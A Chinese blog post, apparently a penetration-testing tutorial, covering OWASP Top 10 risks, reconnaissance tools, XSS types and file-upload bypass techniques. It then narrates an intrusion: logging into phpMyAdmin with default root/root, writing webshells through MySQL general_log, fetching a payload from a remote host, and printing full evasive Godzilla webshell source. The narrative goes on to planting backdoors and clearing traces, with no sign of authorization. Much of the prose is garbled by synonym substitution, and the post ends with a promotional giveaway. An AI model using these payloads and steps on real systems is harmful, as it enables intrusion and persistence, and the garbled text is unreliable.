序言:什么是渗透测试
渗透测试,是为了证明网络防御按照预期操持正常运行而供应的一种机制。不妨假设,你的公司定期更新安全策略和程序,时时给系统打补丁,并采取了漏洞扫描器等工具,以确保所有补丁都已打上。如果你早已做到了这些,为什么还要请外方进行审查或渗透测试呢?由于,渗透测试能够独立地检讨你的网络策略,换句话说,便是给你的系统安了一双眼睛。而且,进行这类测试的,都是探求网络系统安全漏洞的专业人士。
渗透测试的范围:操作系统(windows、solaris、aix、linux等操作系统)运用系统(web、ftp、mail、dns、网盘等运用系统)网络设备(各种防火墙、入侵检测系统、网络路由交流设备)数据库系统(ms-sql、oraacle、mysql、db2等数据库)安全管理(安全管理的规章制度、业务流程等)渗透测试流程:明确目标-[信息网络-信息整理-信息剖析]-漏洞探测-漏洞验证-获取所需-形成报告 一样平常会在信息方面所花费的韶光大约在渗透测试中占80%
Web运用程序与风险
注入
将不受信赖的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS注入和LDAP注入的注入毛病。攻击者的恶意数据可以诱使解析器在没有适当授权的情形下实行非预期命令或访问数据。
失落效的身份认证
常日,通过缺点利用运用程序的身份认证和会话管理功能,攻击者能够破译密码、密钥或会话令牌,或者利用其它开拓毛病光降时性或永久性伪装其他用户的身份。
失落效的身份认证
常日,通过缺点利用运用程序的身份认证和会话管理功能,攻击者能够破译密码、密钥或会话令牌,或者利用其它开拓毛病光降时性或永久性伪装其他用户的身份。
敏感数据透露
许多Web运用程序和API都无法精确保护敏感数据,例如:财务数据、医疗数据和PII数据。攻击者可以通过盗取或修正未加密的数据来履行信用卡诱骗、身份盗窃或其他犯罪行为。未加密的敏感数据随意马虎受到毁坏,因此,我们须要对敏感数据加密,这些数据包括:传输过程中的数据、存储的数据以及浏览器的交互数据。
XML 外部实体(XXE)
许多较早的或配置缺点的XML处理器评估了XML文件中的外部实体引用。攻击者可以利用外部实体盗取利用URI文件处理器的内部文件和共享文件、监听内部扫描端口、实行远程代码和履行谢绝做事攻击。
失落效的访问掌握
未对通过身份验证的用户履行恰当的访问掌握。攻击者可以利用这些毛病访问未经授权的功能或数据,例如:访问其他用户的帐户、查看敏感文件、修正其他用户的数据、变动访问权限等。
安全配置缺点
安全配置缺点是最常见的安全问题,这常日是由于不屈安的默认配置、不完全的临时配置、开源云存储、缺点的 HTTP 标头配置以及包含敏感信息的详细缺点信息所造成的。因此,我们不仅须要对所有的操作系统、框架、库和运用程序进行安全配置,而且必须及时修补和升级它们。
跨站脚本(XSS)
当运用程序的新网页中包含不受信赖的、未经恰当验证或转义的数据时,或者利用可以创建 HTML或JavaScript 的浏览器 API 更新现有的网页时,就会涌现 XSS 毛病。XSS 让攻击者能够在受害者的浏览器中实行脚本,并挟制用户会话、毁坏网站或将用户重定向到恶意站点。
不屈安的反序列化
不屈安的反序列化会导致远程代码实行。纵然反序列化毛病不会导致远程代码实行,攻击者也可以利用它们来实行攻击,包括:重播攻击、注入攻击和特权升级攻击。
利用含有已知漏洞的组件
组件(例如:库、框架和其他软件模块)拥有和运用程序相同的权限。如果运用程序中含有已知漏洞的组件被攻击者利用,可能会造成严重的数据丢失或做事器接管。同时,利用含有已知漏洞的组件的运用程序和API可能会毁坏运用程序防御、造成各种攻击并产生严重影响。
不敷的日志记录和监控
不敷的日志记录和监控,以及事宜相应缺失落或无效的集成,使攻击者能够进一步攻击系统、保持持续性或转向更多系统,以及修改、提取或销毁数据。大多数毛病研究显示,毛病被检测出的韶光超过200天,且常日通过外部检测方检测,而不是通过内部流程或监控检测。
Web运用程序技能安全工具-信息网络工具
网站操作类型识别办法
WindowsLinux网站指纹识别工具
目录扫描
敏感文件扫描
IP查询
端口扫描
常见端口
21-FTP22-SSH23-Telnet25-Mail53-DNS67-DHCP80-HTTP110-POP3135-RPC139-NetBIOS433-HTTPS445-SMB协议3306-MySQL3389-远程桌面1433-MySQL1521-OracleWhois查询package Whois查询工具20; import net.sf.json.JSONObject; import java.io.;import java.net.HttpURLConnection;import java.net.URL;import java.net.URLEncoder;import java.util.HashMap;import java.util.Map;import java.util.Scanner; public class WhoisCheck { public static final String DEF_CHATSET = "UTF-8"; public static final int DEF_CONN_TIMEOUT = 30000; public static final int DEF_READ_TIMEOUT = 30000; public static String userAgent = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36"; public static final String APPKEY ="";//申请API的APPKEY public static void main(String args[]){ System.out.println("请输出想要查询信息的域名"); Scanner sc=new Scanner(System.in); String host=sc.next(); whois(host); } public static void whois(String host){ String result=null; String url="http://apidata.chinaz.com/CallAPI/Whois"; Map params = new HashMap(); params.put("domainName",host); params.put("key",APPKEY); try{ result =net(url, params, "GET"); JSONObject object = JSONObject.fromObject(result); if(object.getInt("StateCode")==1){ System.out.println("该域名已经被注册过,详细信息如下:"); System.out.print(object.getString("Result")); } else System.out.println("该域名还未曾被注册过"); }catch (Exception e){ e.printStackTrace(); } } public static String net(String strUrl, Map params, String method) throws Exception { HttpURLConnection conn = null; BufferedReader reader = null; String rs = null; try { StringBuffer sb = new StringBuffer(); if(method==null || method.equals("GET")){ strUrl = strUrl+"?"+urlencode(params); } URL url = new URL(strUrl); conn = (HttpURLConnection) url.openConnection(); if(method==null || method.equals("GET")){ conn.setRequestMethod("GET"); }else{ conn.setRequestMethod("POST"); conn.setDoOutput(true); } conn.setRequestProperty("User-agent", userAgent); conn.setUseCaches(false); conn.setConnectTimeout(DEF_CONN_TIMEOUT); conn.setReadTimeout(DEF_READ_TIMEOUT); conn.setInstanceFollowRedirects(false); conn.connect(); if (params!= null && method.equals("POST")) { try { DataOutputStream out = new DataOutputStream(conn.getOutputStream()); out.writeBytes(urlencode(params)); } catch (Exception e) { e.printStackTrace(); } } InputStream is = conn.getInputStream(); reader = new BufferedReader(new InputStreamReader(is, DEF_CHATSET)); String strRead = null; while ((strRead = reader.readLine()) != null) { sb.append(strRead); } rs = sb.toString(); } catch (IOException e) { e.printStackTrace(); } finally { if (reader != null) { reader.close(); } if (conn != null) { conn.disconnect(); } } return rs; } //将map型转为要求参数型 public static String urlencode(Map<String,String> data) { StringBuilder sb = new StringBuilder(); for (Map.Entry i : data.entrySet()) { try { sb.append(i.getKey()).append("=").append(URLEncoder.encode(i.getValue()+"","UTF-8")).append("&"); } catch (UnsupportedEncodingException e) { e.printStackTrace(); } } return sb.toString(); } }
子域名查询
查询子域名有三种方法:
通过爆破子域名进行查询,如 Layer子域名爆破机、subDomainBrute,在线子域名查询网站:https://phpinfo.me/domain/通过查询DNS做事器,查询该域下的解析记录通过HTTPS证书来查询(只适用于https网站) ,如:https://crt.sh/ 便是通过https证书查询子域名通过google查询空间搜索引擎信息网络报告安全工具-漏洞扫描国外产品
Acunetix Web Vunerability ScannerArVSNexpoSeNessU5OpenVASVulsnmapAppScanBurpsuiteWeblnspectArachnilOWASP ZAP ZAP(Zet Attack Proxy)是环球数百名志愿者程序员在积极更新掩护的著名渗透测试工具之一。它是一款跨平台的JavaT具,乃至都可以在Raspberry Pi上运行、ZAP在浏览器和Web运用程序之间挡载和检讨,w3af w3af是一个从2006年年底开始的基于Python的开源项目,可用于Linux和Windows系统。w3af能够检测200多个漏洞,包括OWASP top 10中提到的海内工具
智恒同盟WebPecker诺赛科技Pangolin安恒MatriXay 安恒明鉴 WEB运用弱点扫描器绿盟NSFOCUS RSAS 极光远程安全评估系统SQL注入政击技能SQLmap
顾名思义,我们可以借助sqLmap对数据库进行渗透测试和漏洞查找。
Pangolin
Pangolin做SQL注入扫描
OWASP XenotixXSS
OWASP的XenotixXSS是一个用于查找和利用跨站点脚本的高等框架,内置了三个智能模糊器,用于快速扫描和结果优化
XSS跨站脚本攻击反射型XSS:
给用户发送页面或者链接,让用户点击来进行攻击,也叫做“非持久型XSS”。
存储型XSS:
把攻击存放在做事端,可能造成传播(比如博客系统,每个访问该页面的人都有可能被攻击),主动性更强。
比较常见的一种场景便是,黑客写下一篇包含有恶意JavaScript代码的博客文章,文章揭橥后,所有访问该博客文章的用户,都会在他们的浏览器中实行这段恶意的Javascript代码。黑客把恶意的脚本保存到做事器端,以是这种XSS攻击叫做“存储型XSS”。也叫做“持久型XSS”,由于从效果上来说,它存在的韶光是比较长的。
DOM型:
实质上是反射型,但是是通过用户点击,修正原来dom元素的属性,布局攻击动作
反射型和dom型差异:
反射型是布局好了攻击动作,然后就等你打开那个页面;dom型也是等你点击,但是不是页面,通过用户动作,把原来的动作注释掉,然后加上自己修正的动作。
上传验证绕过技能1.客户端验证绕过
很大略啦,直策应用webscarab或者burp修正一下后缀名就行。
2.做事端验证绕过-Content-type检测
若做事端检测文件类型时是检测Content-type的值,也很大略,在webscarab或者burp中修正Content-type。
如php中 if($_FILES['userfile']['type'] != “image/gif”) 即是检测Content-type值。
3.做事端验证绕过-扩展名检测
a. 探求漏网之鱼,如fckeditor 2.4.3 或之前版本的黑名单中就可以上传诸如asa,cer之类的文件。b. 大小写绕过,如aSp,pHp。c. 特殊文件名布局。比如发送的http 包里把文件名改成help.asp. 或help.asp_(下划线为空格),这种命名办法在windows 系统里是不被许可的,以是须要在burp 之类里进行修正,然后绕过验证后,会被windows 系统自动去掉后面的点和空格。
d. IIS或者nginx文件解析漏洞。比如比如help.asp;.jpg 或http://www.xx.com/help.jpg/2.php。e. 0×00截断绕过。例如:help.asp .jpg(asp后面为0×00),在判断时,大多函数取后缀名是从后往前取,故能够通过,但是在保存时,却被保存为help.asp。f. 双扩展名解析绕过攻击(1)如果上传一个文件名为help.php.123首先扩展名123 并没有在扩展名blacklist 里,然后扩展名123 也没在Apache 可解析扩展名list 里,这个时候它会向前征采下一个可解析扩展名,或征采到.php,末了会以php 实行。
g. 双扩展名解析绕过攻击(2)这时只要文件名里包含.php,纵然文件名是test2.php.jpg 也会以php 来实行。4 各种攻击办法的相互关系及组合
首先客户端端验证和做事端验证是相互独立的,以是分开绕过就行了,紧张难点是在做事端验证的组合上。
文件完全性检测已经包含文件头检测和图像大小及干系信息检测,但不包含文件扩展名检测。它因此加载来作为检测的办法,比如用图像渲染函数去渲染一张图片。文件扩展名检测和文件头检测都是同级的,相互独立,以是如果是文件扩展名+文件头检测可以同时分开绕过。
文件包含漏洞本地文件包含漏洞:
当被包含的文件在做事器本地时,就形成确当地文件包含漏洞。
远程文件包含漏洞:
本地文件包含和远程文件包含造成漏洞的缘故原由是一样的,当php.ini 中的配置选项allow_url_fopen和allow_url_include为ON的话,则包含的文件可以
是第三方做事器中的文件,这样就形成了远程文件包含漏洞。
CSRF攻击技能站内这种类型的漏洞在一定程度上是由于程序员滥用$__request类变量造成的。(在一样平常该当利用post和get的时候)[修正密码]站外这种类型的漏洞在实质上便是传统意义上的外部提交数据问题。【spam问题:即垃圾留言,垃圾评论,或者带有站外链接的恶意回答】
远程代码实行漏洞fastjson 远程代码实行漏洞
复现
反弹shell
正向反弹反向反弹XXE事理利用防御XML DTD
DTD语法
利用办法
防御XXE
判断是否存在XXE漏洞
编辑器漏洞目录扫描
目录遍历
蜘蛛爬行
暴力预测C/S架构暴力猜解
B/S架构暴力猜解
验证码安全逻辑漏洞验证机制毛病
会话管理毛病
权限管理毛病
业务逻辑毛病
登录毛病
支付逻辑毛病
API乱用
业务安全问题修改型
对各种id的修改对邮箱、手机号的修改对session的修改对返回值的修改对数量、金额的修改回显型跳过型弱验证
校验码弱验证密码重置链接Token弱验证项目实战确定目标网络信息x.x.x.x
首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。。随手加个路径,报错了,当看到这个界面我瞬间就有思路了
为什么这么说呢,由于之前我就遇见过这样的网站报错, 这是一个php集成环境,叫upupw,跟phpstudy是一样的
upupw --> pmd phpstudy --> phpmyadmin
打破点
这个集成环境包也有个phpinfo的页面,跟数据库管理界面
u.php
root/root
root/root
连接成功后就可以看到phpinfo的页面
好了现在问题变成phpmyadmin拿shell
getshell
三步拿shell
set global general_log='on';SET global general_log_file='D:/xxxx/WWW/cmd.php';SELECT '<?php assert($_POST["cmd"]);?>';
当实行第三步的时候页面 卡在实行中。。。没有反应 瞬间觉得不对,可能存在waf换了个免杀马试试,先写到txt里边看算作否成功
没有任何问题,下面直接写入php文件
可以写入,直接去连接shell
果真有waf,当时写入的时候就觉得到了,不免杀的shell,sql语句实行不了
绕过waf怼了半天都不知道是什么鬼waf,用下载文件试试为了避免拦截php代码的waf,我这里远程下载的脚本是利用JavaScript转写php
SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php';SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>'
访问11.php 就会天生shell.php这里的shell也是用了哥斯拉的免杀shell
<?php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='pass'; $V='payload'; $T='3c6e0b8a9c15224a'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p."");}} $R=new C(); $R->nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } }
考试测验了这么多次
进程里没有waf进程
权限是system
脱源码
上传抓密码工具,直接获取管理密码,登上做事器
留后门,清理痕迹多留几个后门,万一被删
这个网段还有这么多机器
源码
打开源码才创造waf是360webscan
我是一名渗透测试工程师,为了感谢读者们,我想把我收藏的一些网络安全/渗透测试学习干货贡献给大家,回馈每一个读者,希望能帮到你们。
干货紧张有:
①2000多本网安必看电子书(主流和经典的书本该当都有了)
②PHP标准库资料(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ 网络安全根本入门、Linux运维,web安全、渗透测试方面的视频(适宜小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ 渗透测试工具大全
⑦ 2021网络安全/Web安全/渗透测试工程师口试手册大全
SRC漏洞汇总
网安必看书本
Web安全学习视频
全套工具包
SRC技能文档
CTF
划重点:须要获取以上全部资料的同学请关注+三连后 私信【资料】
即可免费领取
【资料获取】
